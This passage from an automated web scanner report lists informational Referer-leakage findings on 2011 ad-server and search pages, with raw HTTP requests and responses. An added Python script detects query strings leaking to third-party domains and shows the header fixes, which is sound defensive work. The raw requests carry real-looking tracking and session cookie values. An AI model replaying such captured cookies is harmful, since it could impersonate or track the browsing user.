Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=300x250;ord=$random$?" type="text/javascript"></script>
<noscript><a href="http://ads.guardian.co.uk/event.ng/Type=click&FlightID=$FlightID$&AdID=$AdID$&TargetID=$TargetID$&Values=$Values$&Redirect=http://a.collective-media.net/jump/cm.guardian/;sz=300x250;ord=$random$?" target="_blank"><img src="http://a.collective-media.net/ad/cm.guardian/;sz=300x250;ord=$random$?" width="300" height="250" border="0" alt="http://ads.guardian.co.uk/event.ng/Type%3dclick%26FlightID%3d$FlightID$%26AdID%3d$AdID$%26TargetID%3d$TargetID$%26Values%3d$Values$%26Redirect%3d"></a></noscript><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,BusinessAndFinance" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...

19.159. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2122

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<iframe width="728" height="90" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" src="http://as.chango.com/links/adunit/1.31759946545e+12?adid=13711&adpos=1&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84408083393&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIiZpXV8Zmapdw&eid=Rubicon&ht=90&ibs=None&kf=202041&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=6470e43e-ed51-11e0-81dc-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599465450&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united&wh=728&wp=6986326554ACD8CE&sig=fd001c7a6371daa8b682763d91066818"></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,BusinessAndFinance" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...

19.160. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^3; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3188003.js^3^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=728x90;ord=$random$?" type="text/javascript"></script>
<noscript><a href="http://ads.guardian.co.uk/event.ng/Type=click&FlightID=$FlightID$&AdID=$AdID$&TargetID=$TargetID$&Values=$Values$&Redirect=http://a.collective-media.net/jump/cm.guardian/;sz=728x90;ord=$random$?" target="_blank"><img src="http://a.collective-media.net/ad/cm.guardian/;sz=728x90;ord=$random$?" width="728" height="90" border="0" alt="http://ads.guardian.co.uk/event.ng/Type%3dclick%26FlightID%3d$FlightID$%26AdID%3d$AdID$%26TargetID%3d$TargetID$%26Values%3d$Values$%26Redirect%3d"></a></noscript><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,BusinessAndFinance" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...

19.161. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=300x250;ord=$random$?" type="text/javascript"></script>
<noscript><a href="http://ads.guardian.co.uk/event.ng/Type=click&FlightID=$FlightID$&AdID=$AdID$&TargetID=$TargetID$&Values=$Values$&Redirect=http://a.collective-media.net/jump/cm.guardian/;sz=300x250;ord=$random$?" target="_blank"><img src="http://a.collective-media.net/ad/cm.guardian/;sz=300x250;ord=$random$?" width="300" height="250" border="0" alt="http://ads.guardian.co.uk/event.ng/Type%3dclick%26FlightID%3d$FlightID$%26AdID%3d$AdID$%26TargetID%3d$TargetID$%26Values%3d$Values$%26Redirect%3d"></a></noscript><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,BusinessAndFinance" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...

19.162. http://searchit.sabre.com/query.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://searchit.sabre.com
Path:   /query.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /query.html?qt=bond+interest+euro&search=search&col=shc&qs=&charset=iso-8859-1&ht=0&qp= HTTP/1.1
Host: searchit.sabre.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://sabre-holdings.com/aboutUs/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=240286337.1704621303.1317600419.1317600419.1317600419.1; __utmb=240286337.2.10.1317600419; __utmc=240286337; __utmz=240286337.1317600419.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=sabre%20travel

Response

HTTP/1.0 200 OK
Server: Ultraseek 5.0.3
Date: Mon, 03 Oct 2011 00:08:37 GMT
Content-type: text/html; charset=iso-8859-1
Content-length: 7727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script language="JavaScript" type="text/javascript">

<!-- Get conent page link from URL
...[SNIP]...
</div>
<a href="http://www.verity.com/"><img alt="Powered by Verity" src="/images/poweredby.gif" width=161 height=45 border=0 align=right>
...[SNIP]...
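The entries in this section all share one finding: the page was requested with a query string, and the response references other domains, so a browser following those references sends the query string to the third party in the Referer header. In 19.162 the query string carries the user's search terms (qt=bond+interest+euro) and the response links to www.verity.com. The script below is an added example, not part of the XSS.CX report or of the scanner that produced it; it reproduces that check over a response body and shows the two controls that close the leak (a Referrer-Policy response header, or rel="noreferrer" on the link). The sample body is constructed from fragments of entries 19.162 and 19.163 plus one hypothetical example.net link; the assumption that an absent Referrer-Policy leaks the full URL matches browsers of the report's era, whereas current browsers default to strict-origin-when-cross-origin.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# (tag, attribute) pairs whose value makes the browser request another URL
# and therefore send a Referer header for the page that contained them.
URL_ATTRS = {
    ("a", "href"), ("link", "href"), ("form", "action"),
    ("script", "src"), ("img", "src"), ("iframe", "src"),
}

# Referrer-Policy values under which a cross-origin request still carries
# the full URL, query string included. An absent header ("") is treated the
# same way here: that is what 2011-era browsers did, and what the scanner
# assumes. Modern browsers default to strict-origin-when-cross-origin.
LEAKY_POLICIES = {"", "unsafe-url", "no-referrer-when-downgrade"}


class RefCollector(HTMLParser):
    """Collects every outbound reference (tag, url, rel tokens) in a body."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # html.parser lowercases attribute names
        for t, a in URL_ATTRS:
            if t == tag and attrs.get(a):
                rel = (attrs.get("rel") or "").lower().split()
                self.refs.append((tag, attrs[a].strip(), rel))


def cross_domain_refs(request_url, body):
    """Return (tag, url, rel) for references whose host differs from the
    request host. Relative URLs have no host and are same-domain."""
    own_host = (urlsplit(request_url).hostname or "").lower()
    parser = RefCollector()
    parser.feed(body)
    out = []
    for tag, url, rel in parser.refs:
        host = urlsplit(url).hostname
        if host and host.lower() != own_host:
            out.append((tag, url, rel))
    return out


def referer_leakage(request_url, body, response_headers=None):
    """Reproduce the scanner's check: query string in the loaded URL plus
    cross-domain references. A reference leaks unless the response sets a
    Referrer-Policy that strips the path, or the link carries rel=noreferrer.
    Cross-domain <script src> is reported separately: that third party runs
    code in the page's origin, which is a bigger problem than a Referer."""
    headers = {k.lower(): v for k, v in (response_headers or {}).items()}
    policy = headers.get("referrer-policy", "").strip().lower()
    query = urlsplit(request_url).query
    refs = cross_domain_refs(request_url, body)
    leaking = [
        (tag, url) for tag, url, rel in refs
        if policy in LEAKY_POLICIES and "noreferrer" not in rel
    ]
    return {
        "query_string": query,
        "cross_domain": [(tag, url) for tag, url, _ in refs],
        "script_includes": [url for tag, url, _ in refs if tag == "script"],
        "leaks_query": bool(query) and bool(leaking),
        "leaking_to": sorted({urlsplit(u).hostname for _, u in leaking}),
    }


# Constructed sample: the request URL from entry 19.162 (search terms in the
# query string) and a body built from the 19.162 link to verity.com, the
# 19.163 googleadservices script include, and one hypothetical example.net
# link that uses rel="noreferrer".
SAMPLE_URL = ("http://searchit.sabre.com/query.html?qt=bond+interest+euro"
              "&search=search&col=shc&qs=&charset=iso-8859-1&ht=0&qp=")
SAMPLE_BODY = """<html><body>
<a href="/query.html?qt=bond&col=shc">same host, no leak</a>
<a href="http://www.verity.com/"><img alt="Powered by Verity" src="/images/poweredby.gif"></a>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
<a href="http://example.net/" rel="noreferrer">hypothetical, noreferrer</a>
</body></html>"""

if __name__ == "__main__":
    before = referer_leakage(SAMPLE_URL, SAMPLE_BODY)
    after = referer_leakage(SAMPLE_URL, SAMPLE_BODY,
                            {"Referrer-Policy": "strict-origin-when-cross-origin"})
    print("leaks query string to:", before["leaking_to"])
    print("cross-domain script includes:", before["script_includes"])
    print("leaks after Referrer-Policy fix:", after["leaks_query"])
```

Run against the sample, the report lists www.verity.com and www.googleadservices.com as recipients of the qt= search terms, excludes the rel="noreferrer" link, and flags the googleadservices script as a cross-domain include. Adding Referrer-Policy: strict-origin-when-cross-origin to the response turns leaks_query off without touching the links; removing the query string from the request URL has the same effect, which is why sensitive values belong in a POST body or a cookie rather than in a GET query.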

19.163. http://seg.sharethis.com/getSegment.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 03 Oct 2011 00:27:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 6174


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<img src="http://al1.sharethis.com/impr?campaign=adx-impr" alt=""/>
       <img src="http://cm.g.doubleclick.net/pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A" alt=""/>                <script type="text/javascript">
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>

           <img src="http://pixel.rubiconproject.com/tap.php?v=6432&rnd1317601648" alt="" width="1" height="1" />

           <img src="http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544463&t=2&rnd1317601648" alt=""/>

           <img src="http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544462&t=2&rnd1317601648" alt=""/>


           <script type="text/javascript">
...[SNIP]...

19.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
